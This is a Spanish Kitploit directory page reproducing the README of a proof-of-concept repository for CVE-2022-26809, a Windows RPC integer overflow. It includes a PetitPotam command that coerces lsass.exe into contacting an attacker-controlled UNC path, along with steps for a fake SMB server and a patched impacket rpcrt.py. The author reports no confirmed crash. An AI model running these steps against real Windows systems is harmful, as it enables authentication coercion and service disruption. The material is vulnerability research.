Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-26809 — PoC y análisis para CVE-2022-26809, una vulnerabilidad de desbordamiento de enteros en el runtime RPC de Windows. Incluye scripts de activación que usan relay de ruta UNC estilo PetitPotam para explotar lsass.exe mediante peticiones ESFRPC. | Kitploit
Herramientas/GitHubGitHub/yuanlink/cve-2022-26809
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónDesarrollo de PayloadsExplotación de Binarios
GitHubyuanlink/cve-2022-26809

CVE-2022-26809

PoC y análisis para CVE-2022-26809, una vulnerabilidad de desbordamiento de enteros en el runtime RPC de Windows. Incluye scripts de activación que usan relay de ruta UNC estilo PetitPotam para explotar lsass.exe mediante peticiones ESFRPC.

Ver Repositorio
61271hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-26809

Este repositorio es simplemente una investigación sobre el CVE; para un análisis más detallado, consulta aquí.
ACTUALIZACIÓN:05/19 2022
Este análisis aún no ha sido terminado....

ACTUALIZACIÓN:05/22 2022
El Post de HuanGMz y el blog de corelight muestran el punto vulnerable real:

OSF_CASSOCIATION::ProcessBindAckOrNak

Esta vulnerabilidad se desencadena como CVE-2021-43893; al enviar la solicitud ESFRPC a lsass.exe con ruta UNC, la víctima intentará acceder al objetivo como cliente, por lo que provocará un desbordamiento de enteros en la API del cliente.

Si tienes una mejor solución para desencadenar esta vulnerabilidad, no dudes en enviar un issue o un PR :)

PoC-CVE-2022-26809

consulta aquí

Debido a que la vulnerabilidad se desencadena de manera similar a CVE-2021-43893, simplemente clona el código de PetitPotam.

Simplemente prepara el entorno tal como se muestra aquí:

  • desencadenante: con PetitPotam
  • víctima: con rpcrt4.dll vulnerable
  • atacante: con servidor atacante
  1. Ejecuta fake_smb_server.py en el servidor atacante después de reemplazar el rpcrt.py con el original (**Debido a que el puerto 445 ha sido ocupado por System en Windows, se recomienda implementar el servicio en Linux **
  2. Haz que la víctima acceda al servidor atacante con
python petitpotam.py -pipe lsarpc -method DecryptFileSrv -debug "user:[email protected]" "\\attacker.path\realfile
  1. Normalmente no causará un BSOD; habilita el page heap para lsass.exe (Sin embargo, no he logrado desencadenar el BSoD, pero según windbg, el desbordamiento de enteros se ha desencadenado)

Descripción anterior
Aquí está el código de reproducción para la vulnerabilidad de RPC de Windows CVE-2022-26809, y hace referencia a https://github.com/microsoft/Windows-classic-samples/blob/main/Samples/Win7Samples/netds/rpc/hello.

PoC-OSF_SCALL::GetCoalescedBuffer

Mi versión de Python es 3.6.7 No estoy seguro de si GetCoalescedBuffer está involucrado en el CVE-2022-26809 real, solo lo mantengo. el poc.py solo intenta desencadenar la función vulnerable OSF_SCALL::GetCoalescedBuffer, no causará ningún crash porque el desbordamiento de enteros dword es demasiado difícil de reproducir. Y el rpcrt.py es el paquete de Python impacket.dcerpc.v5.rpcrt; solo reemplázalo con el original para desencadenar la vulnerabilidad (Recuerda hacer una copia de seguridad del original :) Creo que el rpcrt.py tiene una gran cantidad de errores).

Si no funciona, quizás wireshark pueda ayudar a localizar el error.

PipeDemo

si es necesario, simplemente usa nmake para recompilarlo

Descargar herramienta